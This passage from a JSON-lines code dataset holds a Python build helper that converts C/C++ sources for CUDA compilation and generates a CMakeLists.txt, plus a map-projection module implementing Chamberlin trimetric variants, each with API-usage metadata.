"call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": 
"torch.nn.ReLU", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.float", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 59, "usage_type": "name"}, {"api_name": "pipeline.utils.tools.JobConfig.load_from_file", "line_number": 82, "usage_type": "call"}, {"api_name": "pipeline.utils.tools.JobConfig", "line_number": 82, "usage_type": "name"}, {"api_name": "pipeline.utils.tools.JobConfig.load_from_file", "line_number": 87, "usage_type": "call"}, {"api_name": "pipeline.utils.tools.JobConfig", "line_number": 87, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn.BCELoss", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 130, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "71521286247", "text": "#!/usr/bin/env python\n\nimport json\nimport subprocess\nimport os\nimport re\nimport shutil\nimport textwrap\n\n# this variable is assigned by cmake during build\nGPU_MPI_BUILD_TYPE = \"@CMAKE_BUILD_TYPE@\"\n\n\ndef is_inside(path, directory):\n path = os.path.realpath(path)\n directory = os.path.realpath(directory)\n 
return directory == os.path.commonpath([directory, path])\n\ndef escape_name(name):\n return name.replace('/', '_').replace('.', '_')\n\n\nheader_pattern = re.compile('#include [<\"](.*)[\">]')\n\ndef find_headers(path_to_file, include_dirs):\n \"\"\" Looks for header inside include_dirs and header local directory.\n Returns list of detected headers.\n \"\"\"\n\n file_dir = os.path.dirname(os.path.realpath(__file__))\n\n # we should search relative headers in current dir\n all_include_dirs = [file_dir] + include_dirs\n\n detected_headers = []\n with open(path_to_file, 'r') as f:\n for match in header_pattern.finditer(f.read()):\n header_name = match.group(1)\n\n # search relative headers in include dirs and detect their absolute location\n absolute_header = None\n if not os.path.isabs(header_name):\n for include_dir in all_include_dirs:\n header_candidate = os.path.join(include_dir, header_name)\n if os.path.exists(header_candidate):\n absolute_header = os.path.realpath(header_candidate)\n break\n\n # if nothing is find, then it is system header that should be skipped\n if absolute_header is None:\n continue\n\n detected_headers.append(absolute_header)\n\n all_headers = detected_headers\n \n # for each detected header we need to look for other includes recurrently\n for header in detected_headers:\n all_headers += find_headers(header, include_dirs)\n\n # return each header once\n all_headers = list(set(all_headers))\n\n return all_headers\n\ndef get_includes(absolute_path, compile_commands):\n for entry in compile_commands:\n if entry['absolute_source_path'] == absolute_path:\n return entry['project_include_dirs']\n raise Exception(f'Entry {absolute_path} not found in compilation database')\n\ndef get_definitions(absolute_path, compile_commands):\n for entry in compile_commands:\n if entry['absolute_source_path'] == absolute_path:\n return entry['definitions']\n raise Exception(f'Entry {absolute_path} not found in compilation database')\n\ndef run_build():\n os.makedirs('./gpumpi_build', exist_ok=True)\n process = subprocess.Popen(f\"cmake .. 
-DCMAKE_BUILD_TYPE={GPU_MPI_BUILD_TYPE}\".split(), cwd='./gpumpi_build')\n process.wait()\n process = subprocess.Popen(\"cmake --build ./gpumpi_build\".split())\n process.wait()\n\nif __name__ == '__main__':\n\n script_dir = os.path.dirname(os.path.realpath(__file__))\n project_dir = os.getcwd()\n\n def run_cmd(command, directory):\n process = subprocess.Popen(command, cwd=directory)\n process.wait()\n if process.returncode != 0:\n raise Exception(\"failed\")\n\n with open('compile_commands.json', 'r') as f:\n compile_commands = json.load(f)\n\n\n all_sources = []\n all_headers = []\n\n for entry in compile_commands:\n # detect include directories inside project dir for each target\n entry['project_include_dirs'] = []\n for arg in entry['arguments']:\n # detect only include directories\n if not arg.startswith('-I'):\n continue\n\n include_dir = arg[2:]\n\n # make all paths absolute\n if not os.path.isabs(include_dir):\n include_dir = os.path.realpath(os.path.join(entry['directory'], include_dir))\n\n # skip includes outside of project directory\n if not is_inside(include_dir, project_dir):\n continue \n\n entry['project_include_dirs'].append(include_dir)\n\n # detect definitions\n entry['definitions'] = []\n for arg in entry['arguments']:\n if arg.startswith('-D'):\n entry['definitions'].append(arg[2:])\n\n\n # detect absolute path to source files\n entry['absolute_source_path'] = os.path.realpath(os.path.join(entry['directory'], entry['file']))\n\n # detect list of headers inside project directory that are used from source files \n all_headers += find_headers(entry['absolute_source_path'], entry['project_include_dirs'])\n all_sources += [entry['absolute_source_path']]\n\n # mention sources and headers only once\n all_sources = list(set(all_sources))\n all_headers = list(set(all_headers))\n\n # create \".cuh\" for very simple headers, because libtooling skips them\n for header in all_headers:\n expected_name = header + '.cuh'\n if not os.path.exists(expected_name):\n shutil.copyfile(header, expected_name)\n\n # add to each include in '.cu' or '.cuh' file additional '.cuh' suffix\n for file_name in (*all_sources, *all_headers):\n\n if file_name in all_sources:\n cu_file_name = file_name + '.cu'\n else:\n cu_file_name = file_name + '.cuh'\n\n with open(cu_file_name, 'r') as in_file: \n text = re.sub('#include ([<\"])(.*)([\">])', '#include \\g<1>\\g<2>.cuh\\g<3>', in_file.read())\n text = re.sub('\\.cuh\\.cuh', '.cuh', text) # fixes double modification\n with open(cu_file_name, 'w') as out_file:\n out_file.write(text)\n\n\n # for each source file detect if __gpu_main present. 
If yes, it will define executable,\n # otherwise, it will define library.\n executables = []\n libraries = []\n for file_name in all_sources:\n cu_file_name = file_name + '.cu'\n with open(cu_file_name, 'r') as f:\n if '__gpu_main' in f.read():\n executables.append(file_name)\n else:\n libraries.append(file_name)\n\n cmakelists = textwrap.dedent(f\"\"\"\n cmake_minimum_required(VERSION 3.12)\n project(examples LANGUAGES C CXX CUDA)\n\n set(CMAKE_CUDA_FLAGS_DEBUG \"${CMAKE_CUDA_FLAGS_DEBUG} -G\") \n\n # specify cuda architectures for newer cmake\n set(CMAKE_CUDA_ARCHITECTURES 60 61 70)\n\n # specify cuda architectures for older cmake\n set(CMAKE_CUDA_FLAGS\n \"${CMAKE_CUDA_FLAGS} \\\n -gencode arch=compute_60,code=sm_60 \\\n -gencode arch=compute_61,code=sm_61 \\\n -gencode arch=compute_70,code=sm_70\")\n\n include({script_dir}/../gpu_libs-exports.cmake)\n\n set(CMAKE_CUDA_SEPARABLE_COMPILATION ON)\n \"\"\")\n\n for f in all_sources:\n includes = get_includes(f, compile_commands)\n defines = get_definitions(f, compile_commands)\n escaped_name = escape_name(f)\n target_type = 'executable' if f in executables else 'library'\n\n cmakelists += textwrap.dedent(f\"\"\"\n add_{target_type}(target_{escaped_name} {f}.cu)\n target_link_libraries(target_{escaped_name} PRIVATE gpu_libs)\n \"\"\")\n\n if includes:\n includes_str = \" \".join(includes)\n cmakelists += textwrap.dedent(f\"\"\"\n target_include_directories(target_{escaped_name} PRIVATE {includes_str})\n \"\"\")\n\n for lib in libraries:\n for exe in executables:\n escaped_lib_name = escape_name(lib)\n escaped_exe_name = escape_name(exe)\n cmakelists += textwrap.dedent(f\"\"\"\n target_link_libraries(target_{escaped_exe_name} PRIVATE target_{escaped_lib_name})\n \"\"\")\n\n with open('CMakeLists.txt', 'w') as f:\n f.write(cmakelists)\n\n run_build()\n\n", "repo_name": "maerhart/dphpc-project", "sub_path": "scripts/build_on_gpu.py", "file_name": "build_on_gpu.py", "file_ext": "py", "file_size_in_byte": 7719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.realpath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.commonpath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 80, "usage_type": 
"call"}, {"api_name": "subprocess.Popen", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 87, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 88, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 145, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 156, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 157, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 174, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 201, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 208, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 216, "usage_type": "call"}]} +{"seq_id": "40325099948", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 31 13:38:02 2019\n\n@author: brsr\n\"\"\"\nimport pyproj\nimport warnings\nimport numpy as np\nfrom abc import ABC\nfrom scipy.optimize import minimize\n\nfrom .transformations import Transformation, UnitVector\nfrom .helper import sqrt, antipode_v, central_angle, trigivenlengths, triangle_solid_angle\n\n#TODO:\n#vectorize all the things, or convert to \n#make a better implementation of conformal\n\n#arange3 = np.arange(3)\n#FIRST AXIS IS SPATIAL\n\n_unitsphgeod = pyproj.Geod(a=1, b=1)\n\nclass Double(Transformation):\n \"\"\"Linear combination of two projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, proj1, proj2, t=0.5):\n subproj = [proj1, proj2]\n super().__init__()\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\n def inv_transform(self, x, y):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].inv_transform(x, y)\n + t*subproj[1].inv_transform(x, y))\n\nclass Multiple(Transformation):\n \"\"\"Linear combination of several projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, subproj, t):\n super().__init__()\n assert len(subproj) == len(t)\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n rx = 0\n for proj, t in zip(self.subproj, self.t):\n rx += t * proj.transform(lon, lat)\n return rx\n\n def 
inv_transform(self, x, y):\n rx = 0\n for proj, t in zip(self.subproj, self.t):\n rx += t * proj.inv_transform(x, y)\n return rx\n \nclass CtrlPtsProjection(Transformation, ABC):\n \"\"\"Subclass for any map projection that uses (2 or more) control points.\"\"\"\n def __init__(self, ctrlpts, geod = _unitsphgeod):\n \"\"\"Parameters:\n ctrlpts: 2x3 or 2x4 Numpy array, latitude and longitude of\n each control point\n geod= a pyproj.Geod object. For a unit sphere use\n pyproj.Geod(a=1,b=1)\n \"\"\"\n n = ctrlpts.shape[1]\n if self.nctrlpts != n:\n raise ValueError(\n 'ctrlpts has wrong number of points for this projection')\n self.geod = geod\n #it's possible to get a geod where this would give the wrong answer,\n #but I think it would have to be really weird\n area, _ = geod.polygon_area_perimeter([0,120,-120],[0,0,0])\n self.totalarea = 2*area\n\n self.ctrlpts = ctrlpts\n ctrlpts_v = UnitVector.transform_v(ctrlpts)\n self.ctrlpts_v = ctrlpts_v\n center_v = ctrlpts_v.sum(axis=1)\n self.center_v = center_v / np.linalg.norm(center_v)\n self.center = UnitVector.invtransform_v(center_v)\n antipode = antipode_v(ctrlpts)\n self.antipode = antipode\n self.antipode_v = UnitVector.transform_v(antipode)\n self.sa = 0\n if self.nctrlpts > 2:\n faz, baz, sides = self.geod.inv(ctrlpts[0], ctrlpts[1],\n np.roll(ctrlpts[0], -1),\n np.roll(ctrlpts[1], -1))\n self.sides = sides\n self.faz = faz\n self.baz = baz\n self.ctrl_angles = (faz - np.roll(baz, 1))%360\n area, _ = geod.polygon_area_perimeter(*ctrlpts)\n self.area = area\n self.ca = central_angle(ctrlpts_v,\n np.roll(ctrlpts_v, -1, axis=1))\n for i in range(1, self.nctrlpts-1):\n self.sa += triangle_solid_angle(ctrlpts_v[..., 0],\n ctrlpts_v[..., i],\n ctrlpts_v[..., i+1])\n\n self.edgenormals = np.cross(ctrlpts_v,\n np.roll(ctrlpts_v, -1, axis=1), axis=0)\n\n else:\n faz, baz, sides = self.geod.inv(ctrlpts[0,0], ctrlpts[1,0],\n ctrlpts[0,1], ctrlpts[1,1])\n self.sides = sides\n self.faz = faz\n self.baz = baz\n self.area = 0\n self.ca = central_angle(ctrlpts_v[..., 0], ctrlpts_v[..., 1])\n self.edgenormals = np.cross(ctrlpts_v[..., 0], ctrlpts_v[..., 1])\n\n self.cosca = np.cos(self.ca)\n self.sinca = np.sin(self.ca)\n\n if self.sa < 0:\n warnings.warn('control polygon is in negative orientation, '\n + 'may cause unusual results')\n\n if self.nctrlpts == 4:\n ctrlpts_v = self.ctrlpts_v\n v0 = ctrlpts_v[..., 0]\n v1 = ctrlpts_v[..., 1]\n v2 = ctrlpts_v[..., 2]\n v3 = ctrlpts_v[..., 3]\n poip1 = np.cross(np.cross(v0, v1), np.cross(v3, v2))\n poip2 = np.cross(np.cross(v0, v3), np.cross(v1, v2))\n poip = np.stack([[poip1, -poip1],\n [poip2, -poip2]]).transpose(2,0,1)\n poip = poip / np.linalg.norm(poip, axis=0)\n self.poi_v = poip\n self.poi = UnitVector.invtransform_v(poip)\n self.crossx = np.cross(ctrlpts_v,\n np.roll(ctrlpts_v, -2, axis=1),\n axis=0)[..., :2]\n\n def orienttgtpts(self, tgtpts, N = (0, 90)):\n \"\"\"Orient target points so that line from 0 to the projection of N\n points up. Will fail if map projection doesn't define tgtpts.\"\"\"\n pN = self.transform(*N)\n if np.allclose(pN, [0,0]):\n raise ValueError('projection of N too close to 0')\n angle = np.arctan2(pN[0],pN[1])\n rotm = np.array([[np.cos(angle), -np.sin(angle)],\n [np.sin(angle), np.cos(angle)]])\n result = rotm @ tgtpts\n self.tgtpts = result\n\n def lune(self, lon, lat):\n \"\"\"\n Determine which lune a point or series of points lies in.\n Lune 0 is the lune with vertex at the centroid and edges passing through\n control points 0 and 1. 
Lune 1 is the same using control pts 1 and 2,\n and Lune 2 uses control pts 2 and 0.\n \"\"\"\n #inexact on ellipsoids but close enough\n testpt = UnitVector.transform(lon, lat)\n testpt_v = testpt.reshape(3,-1)\n ctrlpts_v = self.ctrlpts_v\n center_v = self.center_v\n cx = np.cross(center_v, ctrlpts_v, axis=0)\n sk = cx.T @ testpt_v\n sg = sk >= 0\n ind = sg & ~np.roll(sg, shift=-1, axis=0)\n result = np.argmax(ind, axis=0)\n return result.reshape(testpt.shape[1:])\n\nclass DoubleCtrlPts(CtrlPtsProjection):\n \"\"\"Linear combination of two projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, ctrlpts, proj1, proj2, t=0.5):\n subproj = [proj1(ctrlpts), proj2(ctrlpts)]\n self.nctrlpts = subproj[0].nctrlpts\n if self.nctrlpts != subproj[1].nctrlpts:\n raise ValueError('proj1 and proj2 have different # of ctrlpts')\n super().__init__(ctrlpts)\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\n def inv_transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\nclass KProjection(CtrlPtsProjection):\n exact = True\n k = 1\n def extend(self, v):\n normal = self.center_v\n k = self.k\n n = np.linalg.norm(v, axis=0, keepdims=True)\n if self.exact:\n vdotc = np.tensordot(v, normal, axes=(0, 0))[np.newaxis]\n vdotv = n**2\n p = -vdotc + sqrt(1 + vdotc**2 - vdotv)\n else:\n p = 1 - n\n #print(v.shape, p.shape, normal.shape)\n return v + k*p*normal[..., np.newaxis]\n \n def transform(self, *args, **kwargs):\n return NotImplemented\n \n#%% not-polygonal projections\nclass ChambTrimetric(CtrlPtsProjection):\n \"\"\"Chamberlin trimetric projection\"\"\"\n #FIXME this implementation fails for control triangles with \n #high aspect ratios\n nctrlpts = 3\n\n def __init__(self, ctrlpts, geod=_unitsphgeod):\n super().__init__(ctrlpts, geod)\n self.tgtpts = trigivenlengths(self.sides)\n try:\n self.orienttgtpts(self.tgtpts)\n except ValueError:\n pass\n\n def transform(self, x, y, **kwargs):\n if hasattr(x, '__iter__'):\n raise TypeError()\n tgtpts = self.tgtpts\n f, b, rad = self.geod.inv(self.ctrlpts[0], self.ctrlpts[1],\n x*np.ones(3), y*np.ones(3))\n faz = self.faz\n raz1 = (faz - f) % 360\n radsq = np.array(rad).squeeze()**2\n ctgt = tgtpts.T.copy().view(dtype=complex).squeeze()\n a = np.roll(ctgt, -1) - ctgt\n b = ctgt\n l = abs(a)\n lsq = l**2\n rsq = radsq/lsq\n ssq = np.roll(radsq, -1, axis=-1)/lsq\n x0 = (rsq - ssq + 1)/2\n y0 = sqrt(-rsq**2 + 2*rsq*(ssq + 1) - (ssq - 1)**2)/2\n y0[np.isnan(y0)] = 0\n y = np.where(raz1 > 180, -y0, y0)\n z0 = x0 +1j*y\n pts = (a * z0 + b)\n result = np.mean(pts)\n return result.real, result.imag\n\n def invtransform(self, *args, **kwargs):\n return NotImplemented\n\nclass LstSqTrimetric(ChambTrimetric):\n \"\"\"Least-squares variation of the Chamberlin trimetric projection\"\"\"\n def transform(self, x, y, **kwargs):\n init = super().transform(x, y)\n tgtpts = self.tgtpts\n f, b, rad = self.geod.inv(self.ctrlpts[0], self.ctrlpts[1],\n x*np.ones(3), y*np.ones(3))\n def objective(v):\n x = v[0]\n y = v[1]\n a = tgtpts[0]\n b = tgtpts[1]\n xma = x-a\n ymb = y-b\n dist = np.sqrt(xma**2 + ymb**2)\n result = np.sum((dist - rad)**2 )\n f = 1 - rad/dist\n f[rad <= 0] = 1\n jac = 
2*np.array([np.sum(xma*f), np.sum(ymb*f)])\n return result, jac\n res = minimize(objective, init, jac=True,\n method = 'BFGS')\n return res.x\n\nclass LinearTrimetric(CtrlPtsProjection):\n \"\"\"The linear variation of the Chamberlin Trimetric projection.\"\"\"\n nctrlpts = 3\n matrix1 = np.array([[0,-1],\n [1,0]])\n matrix2 = np.array([[0, -1, 1],\n [1, 0, -1],\n [-1, 1, 0]])\n matrixinv1 = np.array([[-2,1,1],\n [1,-2,1],\n [1,1,-2]])*2/3\n\n def __init__(self, ctrlpts, geod=_unitsphgeod):\n \"\"\"Parameters:\n ctrlpts: 2x3 Numpy array, latitude and longitude of each control point\n geod= a pyproj.Geod object. For a unit sphere use\n pyproj.Geod(a=1,b=1).\n \"\"\"\n super().__init__(ctrlpts, geod)\n self.radius = ((geod.a**(3/2) + geod.b**(3/2))/2)**(2/3)\n self.tgtpts = trigivenlengths(self.sides)\n self.setmat()\n # try:\n # self.orienttgtpts(self.tgtpts)\n # self.setmat()\n # except ValueError:\n # pass\n\n vctrl = self.ctrlpts_v\n self.invctrlvector = np.linalg.pinv(vctrl)\n self.invperpmatrix = self.invctrlvector @ self.invctrlvector.T\n cosrthmin = 1 / np.sqrt(self.invperpmatrix.sum())\n self.hminall = np.arccos(cosrthmin)**2\n\n def setmat(self, tgtpts=None):\n \"\"\"Set matrices that use tgtpts\"\"\"\n if tgtpts is None:\n tgtpts = self.tgtpts\n else:\n self.tgtpts = tgtpts\n tgtde = np.linalg.det(np.concatenate([tgtpts, np.ones((1,3))], axis=0))\n self.m = self.matrix1 @ tgtpts @ self.matrix2 /(2*tgtde)\n self.minv = self.matrixinv1 @ tgtpts.T\n\n def transform_v(self, pts):\n rpts = pts.reshape((2,-1)).T\n rad = []\n for x,y in rpts:\n f, b, radi = self.geod.inv(x*np.ones(3), y*np.ones(3),\n self.ctrlpts[0], self.ctrlpts[1])\n rad.append(radi)\n shape = list(pts.shape)\n shape[0] = 3\n rad = np.array(rad).T\n radsq = np.array(rad)**2\n result = self.m @ radsq\n return result.reshape(pts.shape)\n\n def invtransform_v(self, pts, n=20, stop=1E-8):\n if not self.geod.sphere:\n warnings.warn('inverse transform is approximate on ellipsoids')\n rpts = pts.reshape((2,-1))\n k = self.minv @ rpts/self.radius**2\n hmin = -np.min(k, axis=0)\n print('k: ', k)\n #hmax = np.pi**2-np.max(k, axis=0)\n hminall = self.hminall\n h = np.where(hmin < hminall, hminall, hmin)\n print('h: ', h)\n for i in range(n):\n rsq = (k + h)\n #pos = rsq > 0\n neg = rsq < 0\n zer = rsq == 0\n c = np.where(neg, np.cosh(np.sqrt(-rsq)), np.cos(np.sqrt(rsq)))\n b = np.where(neg, np.sinh(np.sqrt(-rsq)),\n np.sin(np.sqrt(rsq)))/np.sqrt(np.abs(rsq))\n b[zer] = 1\n f = np.einsum('i...,ij,j...', c, self.invperpmatrix, c) - 1\n fprime = np.einsum('i...,ij,j...', c, self.invperpmatrix, b)\n delta = f/fprime\n h += delta\n print('delta:', delta)\n print('h: ', h)\n if np.max(np.abs(delta)) < stop:\n break\n #h = np.clip(h, hmin, hmax)\n rsq = np.clip(k + h, 0, np.pi**2)\n c = np.cos(np.sqrt(rsq))\n vector = self.invctrlvector.T @ c\n print(c)\n print(vector)\n return UnitVector.invtransform_v(vector).reshape(pts.shape)\n\n def nmforplot(self, pts, n=100):\n rpts = pts.reshape((2,-1))\n k = self.minv @ rpts/self.radius**2\n hmin = -np.min(k, axis=0)\n hmax = np.pi**2-np.max(k, axis=0)\n h = np.linspace(hmin,hmax,100).T\n rsq = (k[..., np.newaxis] + h)\n c = np.cos(np.sqrt(rsq))\n nm = np.einsum('i...,ij,j...', c, self.invperpmatrix, c)\n\n return h, nm\n\n\n#%%\nif __name__ == \"__main__\":\n import doctest\n sup = np.testing.suppress_warnings()\n sup.filter(RuntimeWarning)\n options = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS\n with sup:\n doctest.testmod(optionflags = options)\n", "repo_name": "brsr/mapstuff", 
"sub_path": "mapstuff/projections.py", "file_name": "projections.py", "file_ext": "py", "file_size_in_byte": 14925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyproj.Geod", "line_number": 23, "usage_type": "call"}, {"api_name": "transformations.Transformation", "line_number": 25, "usage_type": "name"}, {"api_name": "transformations.Transformation", "line_number": 50, "usage_type": "name"}, {"api_name": "transformations.Transformation", "line_number": 75, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 75, "usage_type": "name"}, {"api_name": "transformations.UnitVector.transform_v", "line_number": 95, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 98, "usage_type": "attribute"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 99, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 99, "usage_type": "name"}, {"api_name": "helper.antipode_v", "line_number": 100, "usage_type": "call"}, {"api_name": "transformations.UnitVector.transform_v", "line_number": 102, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.roll", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 111, "usage_type": "call"}, {"api_name": "helper.central_angle", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 115, "usage_type": "call"}, {"api_name": "helper.triangle_solid_angle", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 122, "usage_type": "call"}, {"api_name": "helper.central_angle", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 135, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 151, "usage_type": "attribute"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 153, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.cross", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 166, "usage_type": 
